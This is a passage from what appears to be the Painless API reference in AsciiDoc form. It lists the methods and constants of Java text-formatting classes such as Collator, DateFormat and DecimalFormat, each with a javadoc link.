{java11-javadoc}/java.base/java/text/ChoiceFormat.html#nextDouble(double)[nextDouble](double) -* static double {java11-javadoc}/java.base/java/text/ChoiceFormat.html#nextDouble(double,boolean)[nextDouble](double, boolean) -* static double {java11-javadoc}/java.base/java/text/ChoiceFormat.html#previousDouble(double)[previousDouble](double) -* {java11-javadoc}/java.base/java/text/ChoiceFormat.html#(java.lang.String)[ChoiceFormat](null) -* {java11-javadoc}/java.base/java/text/ChoiceFormat.html#(double%5B%5D,java.lang.String%5B%5D)[ChoiceFormat](double[], null[]) -* void {java11-javadoc}/java.base/java/text/ChoiceFormat.html#applyPattern(java.lang.String)[applyPattern](null) -* def {java11-javadoc}/java.base/java/text/Format.html#clone()[clone]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/text/Format.html#format(java.lang.Object)[format](Object) -* StringBuffer {java11-javadoc}/java.base/java/text/Format.html#format(java.lang.Object,java.lang.StringBuffer,java.text.FieldPosition)[format](Object, StringBuffer, FieldPosition) -* AttributedCharacterIterator {java11-javadoc}/java.base/java/text/Format.html#formatToCharacterIterator(java.lang.Object)[formatToCharacterIterator](Object) -* Currency {java11-javadoc}/java.base/java/text/NumberFormat.html#getCurrency()[getCurrency]() -* def[] {java11-javadoc}/java.base/java/text/ChoiceFormat.html#getFormats()[getFormats]() -* double[] {java11-javadoc}/java.base/java/text/ChoiceFormat.html#getLimits()[getLimits]() -* int {java11-javadoc}/java.base/java/text/NumberFormat.html#getMaximumFractionDigits()[getMaximumFractionDigits]() -* int {java11-javadoc}/java.base/java/text/NumberFormat.html#getMaximumIntegerDigits()[getMaximumIntegerDigits]() -* int {java11-javadoc}/java.base/java/text/NumberFormat.html#getMinimumFractionDigits()[getMinimumFractionDigits]() -* int {java11-javadoc}/java.base/java/text/NumberFormat.html#getMinimumIntegerDigits()[getMinimumIntegerDigits]() -* RoundingMode {java11-javadoc}/java.base/java/text/NumberFormat.html#getRoundingMode()[getRoundingMode]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/text/NumberFormat.html#isGroupingUsed()[isGroupingUsed]() -* boolean {java11-javadoc}/java.base/java/text/NumberFormat.html#isParseIntegerOnly()[isParseIntegerOnly]() -* Number {java11-javadoc}/java.base/java/text/NumberFormat.html#parse(java.lang.String)[parse](null) -* Number {java11-javadoc}/java.base/java/text/NumberFormat.html#parse(java.lang.String,java.text.ParsePosition)[parse](null, ParsePosition) -* Object {java11-javadoc}/java.base/java/text/Format.html#parseObject(java.lang.String)[parseObject](null) -* Object {java11-javadoc}/java.base/java/text/Format.html#parseObject(java.lang.String,java.text.ParsePosition)[parseObject](null, ParsePosition) -* void {java11-javadoc}/java.base/java/text/ChoiceFormat.html#setChoices(double%5B%5D,java.lang.String%5B%5D)[setChoices](double[], null[]) -* void {java11-javadoc}/java.base/java/text/NumberFormat.html#setCurrency(java.util.Currency)[setCurrency](Currency) -* void {java11-javadoc}/java.base/java/text/NumberFormat.html#setGroupingUsed(boolean)[setGroupingUsed](boolean) -* void {java11-javadoc}/java.base/java/text/NumberFormat.html#setMaximumFractionDigits(int)[setMaximumFractionDigits](int) -* void {java11-javadoc}/java.base/java/text/NumberFormat.html#setMaximumIntegerDigits(int)[setMaximumIntegerDigits](int) -* void {java11-javadoc}/java.base/java/text/NumberFormat.html#setMinimumFractionDigits(int)[setMinimumFractionDigits](int) -* void {java11-javadoc}/java.base/java/text/NumberFormat.html#setMinimumIntegerDigits(int)[setMinimumIntegerDigits](int) -* void {java11-javadoc}/java.base/java/text/NumberFormat.html#setParseIntegerOnly(boolean)[setParseIntegerOnly](boolean) -* void {java11-javadoc}/java.base/java/text/NumberFormat.html#setRoundingMode(java.math.RoundingMode)[setRoundingMode](RoundingMode) -* null {java11-javadoc}/java.base/java/text/ChoiceFormat.html#toPattern()[toPattern]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-CollationElementIterator]] -==== CollationElementIterator -* static int {java11-javadoc}/java.base/java/text/CollationElementIterator.html#NULLORDER[NULLORDER] -* static int {java11-javadoc}/java.base/java/text/CollationElementIterator.html#primaryOrder(int)[primaryOrder](int) -* static short {java11-javadoc}/java.base/java/text/CollationElementIterator.html#secondaryOrder(int)[secondaryOrder](int) -* static short {java11-javadoc}/java.base/java/text/CollationElementIterator.html#tertiaryOrder(int)[tertiaryOrder](int) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/text/CollationElementIterator.html#getMaxExpansion(int)[getMaxExpansion](int) -* int {java11-javadoc}/java.base/java/text/CollationElementIterator.html#getOffset()[getOffset]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/text/CollationElementIterator.html#next()[next]() -* int {java11-javadoc}/java.base/java/text/CollationElementIterator.html#previous()[previous]() -* void {java11-javadoc}/java.base/java/text/CollationElementIterator.html#reset()[reset]() -* void {java11-javadoc}/java.base/java/text/CollationElementIterator.html#setOffset(int)[setOffset](int) -* void {java11-javadoc}/java.base/java/text/CollationElementIterator.html#setText(java.lang.String)[setText](null) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-CollationKey]] -==== CollationKey -* int {java11-javadoc}/java.base/java/text/CollationKey.html#compareTo(java.text.CollationKey)[compareTo](CollationKey) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/text/CollationKey.html#getSourceString()[getSourceString]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* byte[] {java11-javadoc}/java.base/java/text/CollationKey.html#toByteArray()[toByteArray]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Collator]] -==== Collator -* static int {java11-javadoc}/java.base/java/text/Collator.html#CANONICAL_DECOMPOSITION[CANONICAL_DECOMPOSITION] -* static int {java11-javadoc}/java.base/java/text/Collator.html#FULL_DECOMPOSITION[FULL_DECOMPOSITION] -* static int {java11-javadoc}/java.base/java/text/Collator.html#IDENTICAL[IDENTICAL] -* static int {java11-javadoc}/java.base/java/text/Collator.html#NO_DECOMPOSITION[NO_DECOMPOSITION] -* static int {java11-javadoc}/java.base/java/text/Collator.html#PRIMARY[PRIMARY] -* static int {java11-javadoc}/java.base/java/text/Collator.html#SECONDARY[SECONDARY] -* static int {java11-javadoc}/java.base/java/text/Collator.html#TERTIARY[TERTIARY] -* static Locale[] {java11-javadoc}/java.base/java/text/Collator.html#getAvailableLocales()[getAvailableLocales]() -* static Collator {java11-javadoc}/java.base/java/text/Collator.html#getInstance()[getInstance]() -* static Collator {java11-javadoc}/java.base/java/text/Collator.html#getInstance(java.util.Locale)[getInstance](Locale) -* def {java11-javadoc}/java.base/java/text/Collator.html#clone()[clone]() -* int {java11-javadoc}/java.base/java/util/Comparator.html#compare(java.lang.Object,java.lang.Object)[compare](def, def) -* boolean {java11-javadoc}/java.base/java/util/Comparator.html#equals(java.lang.Object)[equals](Object) -* boolean {java11-javadoc}/java.base/java/text/Collator.html#equals(java.lang.String,java.lang.String)[equals](null, null) -* CollationKey {java11-javadoc}/java.base/java/text/Collator.html#getCollationKey(java.lang.String)[getCollationKey](null) -* int {java11-javadoc}/java.base/java/text/Collator.html#getDecomposition()[getDecomposition]() -* int {java11-javadoc}/java.base/java/text/Collator.html#getStrength()[getStrength]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* Comparator {java11-javadoc}/java.base/java/util/Comparator.html#reversed()[reversed]() -* void {java11-javadoc}/java.base/java/text/Collator.html#setDecomposition(int)[setDecomposition](int) -* void {java11-javadoc}/java.base/java/text/Collator.html#setStrength(int)[setStrength](int) -* Comparator {java11-javadoc}/java.base/java/util/Comparator.html#thenComparing(java.util.Comparator)[thenComparing](Comparator) -* Comparator {java11-javadoc}/java.base/java/util/Comparator.html#thenComparing(java.util.function.Function,java.util.Comparator)[thenComparing](Function, Comparator) -* Comparator {java11-javadoc}/java.base/java/util/Comparator.html#thenComparingDouble(java.util.function.ToDoubleFunction)[thenComparingDouble](ToDoubleFunction) -* Comparator {java11-javadoc}/java.base/java/util/Comparator.html#thenComparingInt(java.util.function.ToIntFunction)[thenComparingInt](ToIntFunction) -* Comparator {java11-javadoc}/java.base/java/util/Comparator.html#thenComparingLong(java.util.function.ToLongFunction)[thenComparingLong](ToLongFunction) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-DateFormat]] -==== DateFormat -* static int {java11-javadoc}/java.base/java/text/DateFormat.html#AM_PM_FIELD[AM_PM_FIELD] -* static int {java11-javadoc}/java.base/java/text/DateFormat.html#DATE_FIELD[DATE_FIELD] -* static int {java11-javadoc}/java.base/java/text/DateFormat.html#DAY_OF_WEEK_FIELD[DAY_OF_WEEK_FIELD] -* static int {java11-javadoc}/java.base/java/text/DateFormat.html#DAY_OF_WEEK_IN_MONTH_FIELD[DAY_OF_WEEK_IN_MONTH_FIELD] -* static int {java11-javadoc}/java.base/java/text/DateFormat.html#DAY_OF_YEAR_FIELD[DAY_OF_YEAR_FIELD] -* static int {java11-javadoc}/java.base/java/text/DateFormat.html#DEFAULT[DEFAULT] -* static int {java11-javadoc}/java.base/java/text/DateFormat.html#ERA_FIELD[ERA_FIELD] -* static int {java11-javadoc}/java.base/java/text/DateFormat.html#FULL[FULL] -* static int {java11-javadoc}/java.base/java/text/DateFormat.html#HOUR0_FIELD[HOUR0_FIELD] -* static int {java11-javadoc}/java.base/java/text/DateFormat.html#HOUR1_FIELD[HOUR1_FIELD] -* static int {java11-javadoc}/java.base/java/text/DateFormat.html#HOUR_OF_DAY0_FIELD[HOUR_OF_DAY0_FIELD] -* static int {java11-javadoc}/java.base/java/text/DateFormat.html#HOUR_OF_DAY1_FIELD[HOUR_OF_DAY1_FIELD] -* static int {java11-javadoc}/java.base/java/text/DateFormat.html#LONG[LONG] -* static int {java11-javadoc}/java.base/java/text/DateFormat.html#MEDIUM[MEDIUM] -* static int {java11-javadoc}/java.base/java/text/DateFormat.html#MILLISECOND_FIELD[MILLISECOND_FIELD] -* static int {java11-javadoc}/java.base/java/text/DateFormat.html#MINUTE_FIELD[MINUTE_FIELD] -* static int {java11-javadoc}/java.base/java/text/DateFormat.html#MONTH_FIELD[MONTH_FIELD] -* static int {java11-javadoc}/java.base/java/text/DateFormat.html#SECOND_FIELD[SECOND_FIELD] -* static int {java11-javadoc}/java.base/java/text/DateFormat.html#SHORT[SHORT] -* static int {java11-javadoc}/java.base/java/text/DateFormat.html#TIMEZONE_FIELD[TIMEZONE_FIELD] -* static int {java11-javadoc}/java.base/java/text/DateFormat.html#WEEK_OF_MONTH_FIELD[WEEK_OF_MONTH_FIELD] -* static int {java11-javadoc}/java.base/java/text/DateFormat.html#WEEK_OF_YEAR_FIELD[WEEK_OF_YEAR_FIELD] -* static int {java11-javadoc}/java.base/java/text/DateFormat.html#YEAR_FIELD[YEAR_FIELD] -* static Locale[] {java11-javadoc}/java.base/java/text/DateFormat.html#getAvailableLocales()[getAvailableLocales]() -* static DateFormat {java11-javadoc}/java.base/java/text/DateFormat.html#getDateInstance()[getDateInstance]() -* static DateFormat {java11-javadoc}/java.base/java/text/DateFormat.html#getDateInstance(int)[getDateInstance](int) -* static DateFormat {java11-javadoc}/java.base/java/text/DateFormat.html#getDateInstance(int,java.util.Locale)[getDateInstance](int, Locale) -* static DateFormat {java11-javadoc}/java.base/java/text/DateFormat.html#getDateTimeInstance()[getDateTimeInstance]() -* static DateFormat {java11-javadoc}/java.base/java/text/DateFormat.html#getDateTimeInstance(int,int)[getDateTimeInstance](int, int) -* static DateFormat {java11-javadoc}/java.base/java/text/DateFormat.html#getDateTimeInstance(int,int,java.util.Locale)[getDateTimeInstance](int, int, Locale) -* static DateFormat {java11-javadoc}/java.base/java/text/DateFormat.html#getInstance()[getInstance]() -* static DateFormat {java11-javadoc}/java.base/java/text/DateFormat.html#getTimeInstance()[getTimeInstance]() -* static DateFormat {java11-javadoc}/java.base/java/text/DateFormat.html#getTimeInstance(int)[getTimeInstance](int) -* static DateFormat {java11-javadoc}/java.base/java/text/DateFormat.html#getTimeInstance(int,java.util.Locale)[getTimeInstance](int, Locale) -* def {java11-javadoc}/java.base/java/text/Format.html#clone()[clone]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/text/Format.html#format(java.lang.Object)[format](Object) -* StringBuffer {java11-javadoc}/java.base/java/text/Format.html#format(java.lang.Object,java.lang.StringBuffer,java.text.FieldPosition)[format](Object, StringBuffer, FieldPosition) -* AttributedCharacterIterator {java11-javadoc}/java.base/java/text/Format.html#formatToCharacterIterator(java.lang.Object)[formatToCharacterIterator](Object) -* Calendar {java11-javadoc}/java.base/java/text/DateFormat.html#getCalendar()[getCalendar]() -* NumberFormat {java11-javadoc}/java.base/java/text/DateFormat.html#getNumberFormat()[getNumberFormat]() -* TimeZone {java11-javadoc}/java.base/java/text/DateFormat.html#getTimeZone()[getTimeZone]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/text/DateFormat.html#isLenient()[isLenient]() -* Date {java11-javadoc}/java.base/java/text/DateFormat.html#parse(java.lang.String)[parse](null) -* Date {java11-javadoc}/java.base/java/text/DateFormat.html#parse(java.lang.String,java.text.ParsePosition)[parse](null, ParsePosition) -* Object {java11-javadoc}/java.base/java/text/Format.html#parseObject(java.lang.String)[parseObject](null) -* Object {java11-javadoc}/java.base/java/text/Format.html#parseObject(java.lang.String,java.text.ParsePosition)[parseObject](null, ParsePosition) -* void {java11-javadoc}/java.base/java/text/DateFormat.html#setCalendar(java.util.Calendar)[setCalendar](Calendar) -* void {java11-javadoc}/java.base/java/text/DateFormat.html#setLenient(boolean)[setLenient](boolean) -* void {java11-javadoc}/java.base/java/text/DateFormat.html#setNumberFormat(java.text.NumberFormat)[setNumberFormat](NumberFormat) -* void {java11-javadoc}/java.base/java/text/DateFormat.html#setTimeZone(java.util.TimeZone)[setTimeZone](TimeZone) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-DateFormat-Field]] -==== DateFormat.Field -* static DateFormat.Field {java11-javadoc}/java.base/java/text/DateFormat$Field.html#AM_PM[AM_PM] -* static DateFormat.Field {java11-javadoc}/java.base/java/text/DateFormat$Field.html#DAY_OF_MONTH[DAY_OF_MONTH] -* static DateFormat.Field {java11-javadoc}/java.base/java/text/DateFormat$Field.html#DAY_OF_WEEK[DAY_OF_WEEK] -* static DateFormat.Field {java11-javadoc}/java.base/java/text/DateFormat$Field.html#DAY_OF_WEEK_IN_MONTH[DAY_OF_WEEK_IN_MONTH] -* static DateFormat.Field {java11-javadoc}/java.base/java/text/DateFormat$Field.html#DAY_OF_YEAR[DAY_OF_YEAR] -* static DateFormat.Field {java11-javadoc}/java.base/java/text/DateFormat$Field.html#ERA[ERA] -* static DateFormat.Field {java11-javadoc}/java.base/java/text/DateFormat$Field.html#HOUR0[HOUR0] -* static DateFormat.Field {java11-javadoc}/java.base/java/text/DateFormat$Field.html#HOUR1[HOUR1] -* static DateFormat.Field {java11-javadoc}/java.base/java/text/DateFormat$Field.html#HOUR_OF_DAY0[HOUR_OF_DAY0] -* static DateFormat.Field {java11-javadoc}/java.base/java/text/DateFormat$Field.html#HOUR_OF_DAY1[HOUR_OF_DAY1] -* static DateFormat.Field {java11-javadoc}/java.base/java/text/DateFormat$Field.html#MILLISECOND[MILLISECOND] -* static DateFormat.Field {java11-javadoc}/java.base/java/text/DateFormat$Field.html#MINUTE[MINUTE] -* static DateFormat.Field {java11-javadoc}/java.base/java/text/DateFormat$Field.html#MONTH[MONTH] -* static DateFormat.Field {java11-javadoc}/java.base/java/text/DateFormat$Field.html#SECOND[SECOND] -* static DateFormat.Field {java11-javadoc}/java.base/java/text/DateFormat$Field.html#TIME_ZONE[TIME_ZONE] -* static DateFormat.Field {java11-javadoc}/java.base/java/text/DateFormat$Field.html#WEEK_OF_MONTH[WEEK_OF_MONTH] -* static DateFormat.Field {java11-javadoc}/java.base/java/text/DateFormat$Field.html#WEEK_OF_YEAR[WEEK_OF_YEAR] -* static DateFormat.Field {java11-javadoc}/java.base/java/text/DateFormat$Field.html#YEAR[YEAR] -* static DateFormat.Field {java11-javadoc}/java.base/java/text/DateFormat$Field.html#ofCalendarField(int)[ofCalendarField](int) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/text/DateFormat$Field.html#getCalendarField()[getCalendarField]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-DateFormatSymbols]] -==== DateFormatSymbols -* static Locale[] {java11-javadoc}/java.base/java/text/DateFormatSymbols.html#getAvailableLocales()[getAvailableLocales]() -* static DateFormatSymbols {java11-javadoc}/java.base/java/text/DateFormatSymbols.html#getInstance()[getInstance]() -* static DateFormatSymbols {java11-javadoc}/java.base/java/text/DateFormatSymbols.html#getInstance(java.util.Locale)[getInstance](Locale) -* {java11-javadoc}/java.base/java/text/DateFormatSymbols.html#()[DateFormatSymbols]() -* {java11-javadoc}/java.base/java/text/DateFormatSymbols.html#(java.util.Locale)[DateFormatSymbols](Locale) -* def {java11-javadoc}/java.base/java/text/DateFormatSymbols.html#clone()[clone]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null[] {java11-javadoc}/java.base/java/text/DateFormatSymbols.html#getAmPmStrings()[getAmPmStrings]() -* null[] {java11-javadoc}/java.base/java/text/DateFormatSymbols.html#getEras()[getEras]() -* null {java11-javadoc}/java.base/java/text/DateFormatSymbols.html#getLocalPatternChars()[getLocalPatternChars]() -* null[] {java11-javadoc}/java.base/java/text/DateFormatSymbols.html#getMonths()[getMonths]() -* null[] {java11-javadoc}/java.base/java/text/DateFormatSymbols.html#getShortMonths()[getShortMonths]() -* null[] {java11-javadoc}/java.base/java/text/DateFormatSymbols.html#getShortWeekdays()[getShortWeekdays]() -* null[] {java11-javadoc}/java.base/java/text/DateFormatSymbols.html#getWeekdays()[getWeekdays]() -* null[][] {java11-javadoc}/java.base/java/text/DateFormatSymbols.html#getZoneStrings()[getZoneStrings]() -* int {java11-javadoc}/java.base/java/text/DateFormatSymbols.html#hashCode()[hashCode]() -* void {java11-javadoc}/java.base/java/text/DateFormatSymbols.html#setAmPmStrings(java.lang.String%5B%5D)[setAmPmStrings](null[]) -* void {java11-javadoc}/java.base/java/text/DateFormatSymbols.html#setEras(java.lang.String%5B%5D)[setEras](null[]) -* void {java11-javadoc}/java.base/java/text/DateFormatSymbols.html#setLocalPatternChars(java.lang.String)[setLocalPatternChars](null) -* void {java11-javadoc}/java.base/java/text/DateFormatSymbols.html#setMonths(java.lang.String%5B%5D)[setMonths](null[]) -* void {java11-javadoc}/java.base/java/text/DateFormatSymbols.html#setShortMonths(java.lang.String%5B%5D)[setShortMonths](null[]) -* void {java11-javadoc}/java.base/java/text/DateFormatSymbols.html#setShortWeekdays(java.lang.String%5B%5D)[setShortWeekdays](null[]) -* void {java11-javadoc}/java.base/java/text/DateFormatSymbols.html#setWeekdays(java.lang.String%5B%5D)[setWeekdays](null[]) -* void {java11-javadoc}/java.base/java/text/DateFormatSymbols.html#setZoneStrings(java.lang.String%5B%5D%5B%5D)[setZoneStrings](null[][]) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-DecimalFormat]] -==== DecimalFormat -* {java11-javadoc}/java.base/java/text/DecimalFormat.html#()[DecimalFormat]() -* {java11-javadoc}/java.base/java/text/DecimalFormat.html#(java.lang.String)[DecimalFormat](null) -* {java11-javadoc}/java.base/java/text/DecimalFormat.html#(java.lang.String,java.text.DecimalFormatSymbols)[DecimalFormat](null, DecimalFormatSymbols) -* void {java11-javadoc}/java.base/java/text/DecimalFormat.html#applyLocalizedPattern(java.lang.String)[applyLocalizedPattern](null) -* void {java11-javadoc}/java.base/java/text/DecimalFormat.html#applyPattern(java.lang.String)[applyPattern](null) -* def {java11-javadoc}/java.base/java/text/Format.html#clone()[clone]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/text/Format.html#format(java.lang.Object)[format](Object) -* StringBuffer {java11-javadoc}/java.base/java/text/Format.html#format(java.lang.Object,java.lang.StringBuffer,java.text.FieldPosition)[format](Object, StringBuffer, FieldPosition) -* AttributedCharacterIterator {java11-javadoc}/java.base/java/text/Format.html#formatToCharacterIterator(java.lang.Object)[formatToCharacterIterator](Object) -* Currency {java11-javadoc}/java.base/java/text/NumberFormat.html#getCurrency()[getCurrency]() -* DecimalFormatSymbols {java11-javadoc}/java.base/java/text/DecimalFormat.html#getDecimalFormatSymbols()[getDecimalFormatSymbols]() -* int {java11-javadoc}/java.base/java/text/DecimalFormat.html#getGroupingSize()[getGroupingSize]() -* int {java11-javadoc}/java.base/java/text/NumberFormat.html#getMaximumFractionDigits()[getMaximumFractionDigits]() -* int {java11-javadoc}/java.base/java/text/NumberFormat.html#getMaximumIntegerDigits()[getMaximumIntegerDigits]() -* int {java11-javadoc}/java.base/java/text/NumberFormat.html#getMinimumFractionDigits()[getMinimumFractionDigits]() -* int {java11-javadoc}/java.base/java/text/NumberFormat.html#getMinimumIntegerDigits()[getMinimumIntegerDigits]() -* int {java11-javadoc}/java.base/java/text/DecimalFormat.html#getMultiplier()[getMultiplier]() -* null {java11-javadoc}/java.base/java/text/DecimalFormat.html#getNegativePrefix()[getNegativePrefix]() -* null {java11-javadoc}/java.base/java/text/DecimalFormat.html#getNegativeSuffix()[getNegativeSuffix]() -* null {java11-javadoc}/java.base/java/text/DecimalFormat.html#getPositivePrefix()[getPositivePrefix]() -* null {java11-javadoc}/java.base/java/text/DecimalFormat.html#getPositiveSuffix()[getPositiveSuffix]() -* RoundingMode {java11-javadoc}/java.base/java/text/NumberFormat.html#getRoundingMode()[getRoundingMode]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/text/DecimalFormat.html#isDecimalSeparatorAlwaysShown()[isDecimalSeparatorAlwaysShown]() -* boolean {java11-javadoc}/java.base/java/text/NumberFormat.html#isGroupingUsed()[isGroupingUsed]() -* boolean {java11-javadoc}/java.base/java/text/DecimalFormat.html#isParseBigDecimal()[isParseBigDecimal]() -* boolean {java11-javadoc}/java.base/java/text/NumberFormat.html#isParseIntegerOnly()[isParseIntegerOnly]() -* Number {java11-javadoc}/java.base/java/text/NumberFormat.html#parse(java.lang.String)[parse](null) -* Number {java11-javadoc}/java.base/java/text/NumberFormat.html#parse(java.lang.String,java.text.ParsePosition)[parse](null, ParsePosition) -* Object {java11-javadoc}/java.base/java/text/Format.html#parseObject(java.lang.String)[parseObject](null) -* Object {java11-javadoc}/java.base/java/text/Format.html#parseObject(java.lang.String,java.text.ParsePosition)[parseObject](null, ParsePosition) -* void {java11-javadoc}/java.base/java/text/NumberFormat.html#setCurrency(java.util.Currency)[setCurrency](Currency) -* void {java11-javadoc}/java.base/java/text/DecimalFormat.html#setDecimalFormatSymbols(java.text.DecimalFormatSymbols)[setDecimalFormatSymbols](DecimalFormatSymbols) -* void {java11-javadoc}/java.base/java/text/DecimalFormat.html#setDecimalSeparatorAlwaysShown(boolean)[setDecimalSeparatorAlwaysShown](boolean) -* void {java11-javadoc}/java.base/java/text/DecimalFormat.html#setGroupingSize(int)[setGroupingSize](int) -* void {java11-javadoc}/java.base/java/text/NumberFormat.html#setGroupingUsed(boolean)[setGroupingUsed](boolean) -* void {java11-javadoc}/java.base/java/text/NumberFormat.html#setMaximumFractionDigits(int)[setMaximumFractionDigits](int) -* void {java11-javadoc}/java.base/java/text/NumberFormat.html#setMaximumIntegerDigits(int)[setMaximumIntegerDigits](int) -* void {java11-javadoc}/java.base/java/text/NumberFormat.html#setMinimumFractionDigits(int)[setMinimumFractionDigits](int) -* void {java11-javadoc}/java.base/java/text/NumberFormat.html#setMinimumIntegerDigits(int)[setMinimumIntegerDigits](int) -* void {java11-javadoc}/java.base/java/text/DecimalFormat.html#setMultiplier(int)[setMultiplier](int) -* void {java11-javadoc}/java.base/java/text/DecimalFormat.html#setNegativePrefix(java.lang.String)[setNegativePrefix](null) -* void {java11-javadoc}/java.base/java/text/DecimalFormat.html#setNegativeSuffix(java.lang.String)[setNegativeSuffix](null) -* void {java11-javadoc}/java.base/java/text/DecimalFormat.html#setParseBigDecimal(boolean)[setParseBigDecimal](boolean) -* void {java11-javadoc}/java.base/java/text/NumberFormat.html#setParseIntegerOnly(boolean)[setParseIntegerOnly](boolean) -* void {java11-javadoc}/java.base/java/text/DecimalFormat.html#setPositivePrefix(java.lang.String)[setPositivePrefix](null) -* void {java11-javadoc}/java.base/java/text/DecimalFormat.html#setPositiveSuffix(java.lang.String)[setPositiveSuffix](null) -* void {java11-javadoc}/java.base/java/text/NumberFormat.html#setRoundingMode(java.math.RoundingMode)[setRoundingMode](RoundingMode) -* null {java11-javadoc}/java.base/java/text/DecimalFormat.html#toLocalizedPattern()[toLocalizedPattern]() -* null {java11-javadoc}/java.base/java/text/DecimalFormat.html#toPattern()[toPattern]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-DecimalFormatSymbols]] -==== DecimalFormatSymbols -* static Locale[] {java11-javadoc}/java.base/java/text/DecimalFormatSymbols.html#getAvailableLocales()[getAvailableLocales]() -* static DecimalFormatSymbols {java11-javadoc}/java.base/java/text/DecimalFormatSymbols.html#getInstance()[getInstance]() -* static DecimalFormatSymbols {java11-javadoc}/java.base/java/text/DecimalFormatSymbols.html#getInstance(java.util.Locale)[getInstance](Locale) -* {java11-javadoc}/java.base/java/text/DecimalFormatSymbols.html#()[DecimalFormatSymbols]() -* {java11-javadoc}/java.base/java/text/DecimalFormatSymbols.html#(java.util.Locale)[DecimalFormatSymbols](Locale) -* def {java11-javadoc}/java.base/java/text/DecimalFormatSymbols.html#clone()[clone]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* Currency {java11-javadoc}/java.base/java/text/DecimalFormatSymbols.html#getCurrency()[getCurrency]() -* null {java11-javadoc}/java.base/java/text/DecimalFormatSymbols.html#getCurrencySymbol()[getCurrencySymbol]() -* char {java11-javadoc}/java.base/java/text/DecimalFormatSymbols.html#getDecimalSeparator()[getDecimalSeparator]() -* char {java11-javadoc}/java.base/java/text/DecimalFormatSymbols.html#getDigit()[getDigit]() -* null {java11-javadoc}/java.base/java/text/DecimalFormatSymbols.html#getExponentSeparator()[getExponentSeparator]() -* char {java11-javadoc}/java.base/java/text/DecimalFormatSymbols.html#getGroupingSeparator()[getGroupingSeparator]() -* null {java11-javadoc}/java.base/java/text/DecimalFormatSymbols.html#getInfinity()[getInfinity]() -* null {java11-javadoc}/java.base/java/text/DecimalFormatSymbols.html#getInternationalCurrencySymbol()[getInternationalCurrencySymbol]() -* char {java11-javadoc}/java.base/java/text/DecimalFormatSymbols.html#getMinusSign()[getMinusSign]() -* char {java11-javadoc}/java.base/java/text/DecimalFormatSymbols.html#getMonetaryDecimalSeparator()[getMonetaryDecimalSeparator]() -* null {java11-javadoc}/java.base/java/text/DecimalFormatSymbols.html#getNaN()[getNaN]() -* char {java11-javadoc}/java.base/java/text/DecimalFormatSymbols.html#getPatternSeparator()[getPatternSeparator]() -* char {java11-javadoc}/java.base/java/text/DecimalFormatSymbols.html#getPerMill()[getPerMill]() -* char {java11-javadoc}/java.base/java/text/DecimalFormatSymbols.html#getPercent()[getPercent]() -* char {java11-javadoc}/java.base/java/text/DecimalFormatSymbols.html#getZeroDigit()[getZeroDigit]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* void {java11-javadoc}/java.base/java/text/DecimalFormatSymbols.html#setCurrency(java.util.Currency)[setCurrency](Currency) -* void {java11-javadoc}/java.base/java/text/DecimalFormatSymbols.html#setCurrencySymbol(java.lang.String)[setCurrencySymbol](null) -* void {java11-javadoc}/java.base/java/text/DecimalFormatSymbols.html#setDecimalSeparator(char)[setDecimalSeparator](char) -* void {java11-javadoc}/java.base/java/text/DecimalFormatSymbols.html#setDigit(char)[setDigit](char) -* void {java11-javadoc}/java.base/java/text/DecimalFormatSymbols.html#setExponentSeparator(java.lang.String)[setExponentSeparator](null) -* void {java11-javadoc}/java.base/java/text/DecimalFormatSymbols.html#setGroupingSeparator(char)[setGroupingSeparator](char) -* void {java11-javadoc}/java.base/java/text/DecimalFormatSymbols.html#setInfinity(java.lang.String)[setInfinity](null) -* void {java11-javadoc}/java.base/java/text/DecimalFormatSymbols.html#setInternationalCurrencySymbol(java.lang.String)[setInternationalCurrencySymbol](null) -* void {java11-javadoc}/java.base/java/text/DecimalFormatSymbols.html#setMinusSign(char)[setMinusSign](char) -* void {java11-javadoc}/java.base/java/text/DecimalFormatSymbols.html#setMonetaryDecimalSeparator(char)[setMonetaryDecimalSeparator](char) -* void {java11-javadoc}/java.base/java/text/DecimalFormatSymbols.html#setNaN(java.lang.String)[setNaN](null) -* void 